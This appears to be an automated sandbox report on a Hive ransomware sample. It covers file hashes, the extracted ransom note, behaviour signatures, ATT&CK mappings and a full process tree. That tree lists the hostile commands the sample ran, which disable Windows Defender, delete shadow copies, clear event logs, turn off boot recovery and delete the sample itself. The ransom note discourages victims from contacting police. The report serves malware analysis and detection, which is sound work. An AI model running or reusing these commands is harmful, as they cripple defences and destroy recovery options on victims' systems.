Resubmissions

12-02-2024 06:38

240212-hd166sgg25 10

12-02-2024 06:21

240212-g4tdksgd86 7

Analysis

  • max time kernel
    291s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    12-02-2024 06:38

General

  • Target

    zi1ysv64h.exe

  • Size

    3.3MB

  • MD5

    5384c6825a5707241c11d78529dbbfee

  • SHA1

    85f5587e8ad534c2e5de0e72450b61ebda93e4fd

  • SHA256

    3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21

  • SHA512

    856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f

  • SSDEEP

    49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\K8zJ_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at you will need to purchase our decryption software. Please contact our sales department at: Login: Password: To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.2o4xo files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe
    "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\system32\net.exe
      net.exe stop "SstpSvc" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
    • C:\Windows\system32\net.exe
      net.exe stop "VSS" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1160
    • C:\Windows\system32\sc.exe
      sc.exe config "NetMsmqActivator" start= disabled
      2⤵
      • Launches sc.exe
      PID:2812
    • C:\Windows\system32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
        PID:2444
      • C:\Windows\system32\reg.exe
        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        2⤵
          PID:2916
        • C:\Windows\system32\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2912
        • C:\Windows\system32\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:1992
        • C:\Windows\system32\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          2⤵
            PID:1304
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            2⤵
              PID:1216
            • C:\Windows\system32\reg.exe
              reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
              2⤵
                PID:1920
              • C:\Windows\system32\reg.exe
                reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                2⤵
                  PID:596
                • C:\Windows\system32\reg.exe
                  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                  2⤵
                    PID:712
                  • C:\Windows\system32\reg.exe
                    reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                    2⤵
                      PID:536
                    • C:\Windows\system32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:1860
                      • C:\Windows\system32\reg.exe
                        reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                        2⤵
                        • Modifies security service
                        PID:2920
                      • C:\Windows\system32\wevtutil.exe
                        wevtutil.exe cl application
                        2⤵
                        • Clears Windows event logs
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1576
                      • C:\Windows\System32\Wbem\wmic.exe
                        wmic.exe shadowcopy delete
                        2⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2964
                      • C:\Windows\System32\Wbem\wmic.exe
                        wmic.exe SHADOWCOPY /nointeractive
                        2⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1364
                      • C:\Windows\system32\wevtutil.exe
                        wevtutil.exe cl security
                        2⤵
                        • Clears Windows event logs
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1336
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                        2⤵
                        • Modifies boot configuration data using bcdedit
                        PID:2072
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                        2⤵
                          PID:1808
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                          2⤵
                            PID:852
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit.exe /set {default} recoveryenabled no
                            2⤵
                            • Modifies boot configuration data using bcdedit
                            PID:1748
                          • C:\Windows\system32\wevtutil.exe
                            wevtutil.exe cl system
                            2⤵
                            • Clears Windows event logs
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2400
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin.exe delete shadows /all /quiet
                            2⤵
                            • Interacts with shadow copies
                            PID:444
                          • C:\Windows\system32\reg.exe
                            reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                            2⤵
                              PID:1708
                            • C:\Windows\system32\reg.exe
                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                              2⤵
                                PID:1492
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                2⤵
                                  PID:2828
                                • C:\Windows\system32\reg.exe
                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                  2⤵
                                    PID:580
                                  • C:\Windows\system32\reg.exe
                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                    2⤵
                                      PID:1064
                                    • C:\Windows\system32\reg.exe
                                      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                      2⤵
                                        PID:1312
                                      • C:\Windows\system32\reg.exe
                                        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                        2⤵
                                          PID:2960
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                          2⤵
                                            PID:2568
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                            2⤵
                                              PID:2376
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              2⤵
                                                PID:2288
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                2⤵
                                                  PID:1648
                                                • C:\Windows\system32\reg.exe
                                                  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:1604
                                                  • C:\Windows\system32\reg.exe
                                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                    2⤵
                                                      PID:2212
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                      2⤵
                                                        PID:1792
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                        2⤵
                                                          PID:1288
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:2024
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            PID:2200
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            PID:1924
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            PID:556
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:2688
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:2788
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                2⤵
                                                                  PID:1600
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "WebClient" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:1764
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "wbengine" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:1032
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "VSS" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:2332
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "UI0Detect" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:3024
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "SstpSvc" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:2656
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "SDRSVC" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:2596
                                                                • C:\Windows\system32\sc.exe
                                                                  sc.exe config "SamSs" start= disabled
                                                                  2⤵
                                                                  • Launches sc.exe
                                                                  PID:2700
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe stop "WebClient" /y
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2908
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe stop "wbengine" /y
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2820
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe stop "UI0Detect" /y
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2744
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe stop "SDRSVC" /y
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2292
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe stop "SamSs" /y
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2424
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe stop "NetMsmqActivator" /y
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1456
                                                                • C:\Windows\system32\notepad.exe
                                                                  notepad.exe C:\K8zJ_HOW_TO_DECRYPT.txt
                                                                  2⤵
                                                                  • Opens file in notepad (likely ransom note)
                                                                  PID:1280
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"
                                                                  2⤵
                                                                  • Deletes itself
                                                                  PID:1384
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping.exe -n 5 127.0.0.1
                                                                    3⤵
                                                                    • Runs ping.exe
                                                                    PID:2500
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop "SamSs" /y
                                                                1⤵
                                                                  PID:2732
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 stop "SstpSvc" /y
                                                                  1⤵
                                                                    PID:2828
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                      2⤵
                                                                        PID:2720
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop "VSS" /y
                                                                      1⤵
                                                                        PID:2748
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop "wbengine" /y
                                                                        1⤵
                                                                          PID:2672
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 stop "WebClient" /y
                                                                          1⤵
                                                                            PID:2764
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Set-MpPreference -DisableIOAVProtection $true
                                                                            1⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3064
                                                                          • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                            1⤵
                                                                            • Deletes Windows Defender Definitions
                                                                            PID:1728
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop "UI0Detect" /y
                                                                            1⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2720
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop "SDRSVC" /y
                                                                            1⤵
                                                                              PID:2824
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop "NetMsmqActivator" /y
                                                                              1⤵
                                                                                PID:2676
                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ExportRepair.ini
                                                                                1⤵
                                                                                • Opens file in notepad (likely ransom note)
                                                                                PID:3036
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\OpenExit.xsl.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_m7_htIj8dQY0.2o4xo
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:1988

                                                                              Network

                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                              Execution

                                                                              Command and Scripting Interpreter

                                                                              1
                                                                              T1059

                                                                              Persistence

                                                                              Create or Modify System Process

                                                                              2
                                                                              T1543

                                                                              Windows Service

                                                                              2
                                                                              T1543.003

                                                                              Privilege Escalation

                                                                              Create or Modify System Process

                                                                              2
                                                                              T1543

                                                                              Windows Service

                                                                              2
                                                                              T1543.003

                                                                              Defense Evasion

                                                                              Impair Defenses

                                                                              2
                                                                              T1562

                                                                              Disable or Modify Tools

                                                                              1
                                                                              T1562.001

                                                                              Modify Registry

                                                                              2
                                                                              T1112

                                                                              Indicator Removal

                                                                              3
                                                                              T1070

                                                                              File Deletion

                                                                              2
                                                                              T1070.004

                                                                              Credential Access

                                                                              Unsecured Credentials

                                                                              1
                                                                              T1552

                                                                              Credentials In Files

                                                                              1
                                                                              T1552.001

                                                                              Discovery

                                                                              System Information Discovery

                                                                              1
                                                                              T1082

                                                                              Remote System Discovery

                                                                              1
                                                                              T1018

                                                                              Query Registry

                                                                              1
                                                                              T1012

                                                                              Collection

                                                                              Data from Local System

                                                                              1
                                                                              T1005

                                                                              Impact

                                                                              Inhibit System Recovery

                                                                              3
                                                                              T1490

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\K8zJ_HOW_TO_DECRYPT.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                f939d786e1fb30d287357d553719cf88

                                                                                SHA1

                                                                                b5001e66047bb37310e8b9c78fef2d1ef6443e1f

                                                                                SHA256

                                                                                5f3f1382a950d3c94afafb319c58b2b3731bce694966973685aad6bf9b156cad

                                                                                SHA512

                                                                                8da927a8e9425e10a29daeb4b93f66484eca789805dd66a29bfee52b59c2a6df9895bc5dfd814eca788ed27b53463cdd4e8983ff2fc04496d5998a4193f3c2a9

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                Filesize

                                                                                7KB

                                                                                MD5

                                                                                97714a00624079e4bbc5974dafa2b122

                                                                                SHA1

                                                                                2fb9e15aa796be0f47285f737564c96de5e5b8c7

                                                                                SHA256

                                                                                e3158db42edd5681069d413db3fff20f5a00fe8ed4980ff79365ab75e85820ca

                                                                                SHA512

                                                                                1dc3023ca7a22ad322e07c96d769c72645dc18cfb0f51315efce9351d698040114e4dbef21128d5e5a8f6843bc92439935f121fc2aef87669252cd5878b0e6ec

                                                                              • C:\temp3.swap.2o4xo
                                                                                Filesize

                                                                                727.0MB

                                                                                MD5

                                                                                709fb414f4c6fe22490e6e3eeb540405

                                                                                SHA1

                                                                                bdc7eae6941bf8c8d5dded335e4b987ad7be27d7

                                                                                SHA256

                                                                                452df20968922ccf4abcf62ed60f2b9ffb3fe1aa5677010e348073e8ed7c3200

                                                                                SHA512

                                                                                319d6be5e6e14d895b7ed991ac0f52b26652581a3bb690225d220814615e9dd0ece2273ab56b20fe7f25abb31bac1fa4c1bb474d0ed664b377b932c3c62f624e

                                                                              • memory/2720-28-0x0000000002CE0000-0x0000000002D60000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2720-25-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/2720-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/2720-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
                                                                                Filesize

                                                                                2.9MB

                                                                              • memory/2720-27-0x0000000002CE0000-0x0000000002D60000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2720-26-0x0000000002CE0000-0x0000000002D60000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/2720-24-0x0000000002340000-0x0000000002348000-memory.dmp
                                                                                Filesize

                                                                                32KB

                                                                              • memory/2720-22-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/2720-23-0x0000000002CE0000-0x0000000002D60000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/3064-12-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/3064-15-0x000007FEF4850000-0x000007FEF51ED000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/3064-14-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/3064-7-0x000000001B620000-0x000000001B902000-memory.dmp
                                                                                Filesize

                                                                                2.9MB

                                                                              • memory/3064-11-0x000007FEF4850000-0x000007FEF51ED000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/3064-13-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/3064-10-0x00000000028D0000-0x0000000002950000-memory.dmp
                                                                                Filesize

                                                                                512KB

                                                                              • memory/3064-9-0x000007FEF4850000-0x000007FEF51ED000-memory.dmp
                                                                                Filesize

                                                                                9.6MB

                                                                              • memory/3064-8-0x0000000002810000-0x0000000002818000-memory.dmp
                                                                                Filesize

                                                                                32KB